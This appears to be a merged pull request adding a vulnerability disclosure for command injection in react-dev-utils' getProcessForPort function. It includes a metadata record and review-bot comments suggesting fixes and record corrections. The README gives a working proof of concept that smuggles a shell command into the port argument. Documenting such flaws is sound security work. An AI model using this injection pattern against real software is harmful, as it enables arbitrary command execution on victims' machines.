Command Injection in react-dev-utils #1962

Merged
merged 2 commits into from
Mar 3, 2021
11 changes: 11 additions & 0 deletions bounties/npm/react-dev-utils/1/README.md
@@ -0,0 +1,11 @@
## description
react-dev-utils includes some utilities used by Create React App.

The function getProcessForPort in react-dev-utils is vulnerable to command injection.

## PoC
Create a .js file with the content below and run it, then the file pzhou@shu can be illegally created.

var getProcessForPort = require('react-dev-utils/getProcessForPort');

getProcessForPort('11;$(touch pzhou@shu)');
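Review bot: the `## description` section of this README should state where the injection happens, not just that it exists: `getProcessForPort` passes its `port` argument into an OS command without validating it, which is what the CWE-78 entry and the `Permalinks` line in vulnerability.json (getProcessForPort.js#L28 at commit 22f46a8d) describe, and the affected version should be named here rather than left to the reader. The README also says nothing about what a fix looks like; since a port is a small non-negative integer, recording that the argument should be rejected unless it is a plain integer (for example checked against `^\d+$` and a sane range) before it reaches the shell would make the entry useful to downstream consumers. Two smaller points: capitalise the heading to `## Description` to match `## PoC`, and wrap the two-line PoC in a ```js fence so it renders as code instead of paragraph text.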
61 changes: 61 additions & 0 deletions bounties/npm/react-dev-utils/1/vulnerability.json
@@ -0,0 +1,61 @@
{
"PackageVulnerabilityID": "1",
"DisclosureDate": "2021-03-03",
"AffectedVersionRange": "*",
"Summary": "Command Injection",
"Contributor": {
"Discloser": "834641",
"Fixer": ""
},
"Package": {
"Registry": "npm",
"Name": "react-dev-utils",
"URL": "https://www.npmjs.com/package/react-dev-utils",
"Downloads": "4849977"
},
"CWEs": [
{
"ID": "78",
"Description": "The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."
}
],
"CVSS": {
"Version": "3",
"AV": "N",
"AC": "L",
"PR": "L",
"UI": "N",
"S": "U",
"C": "H",
"I": "H",
"A": "H",
"E": "X",
"RL": "X",
"RC": "X",
"Score": "8.8"
},
"CVEs": [
""
],
"Repository": {
"URL": "https://github.com/facebook/create-react-app/tree/master/packages/react-dev-utils",
"Codebase": [
"JavaScript"
],
"Owner": "facebook",
"Name": "create-react-app",
"Forks": "21400",
"Stars": "86300",
"ForkName": "create-react-app"
},
"Permalinks": [
"https://github.com/facebook/create-react-app/blob/22f46a8d5dfc46fe0f613cd7efbc82344823f461/packages/react-dev-utils/getProcessForPort.js#L28"
],
"References": [
{
"Description": "",
"URL": ""
}
],
"PrNumber": ""
}
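Review bot: several fields in this record are placeholders that will read as real data to anything that parses the file: `"CVEs": [""]` should be an empty array `[]` until an ID is assigned, and the `References` entry whose `Description` and `URL` are both `""` should be removed or filled with the upstream issue or advisory link. `"AffectedVersionRange": "*"` is too broad to stay correct once a fix ships; pin it to the versions actually confirmed (the permalink commit is a starting point) and update it when `Fixer` and `PrNumber`, currently empty, are filled in. On the CVSS vector, `AV:N` with `PR:L` is not supported by the README's PoC, which is a local script that hands attacker-chosen input to `getProcessForPort`; either document the scenario in which a remote, low-privileged user controls the `port` argument, or change the vector to `AV:L` and recompute `Score`. Finally, `"Version": "3"` should name the exact CVSS revision (3.0 or 3.1) the vector was scored against.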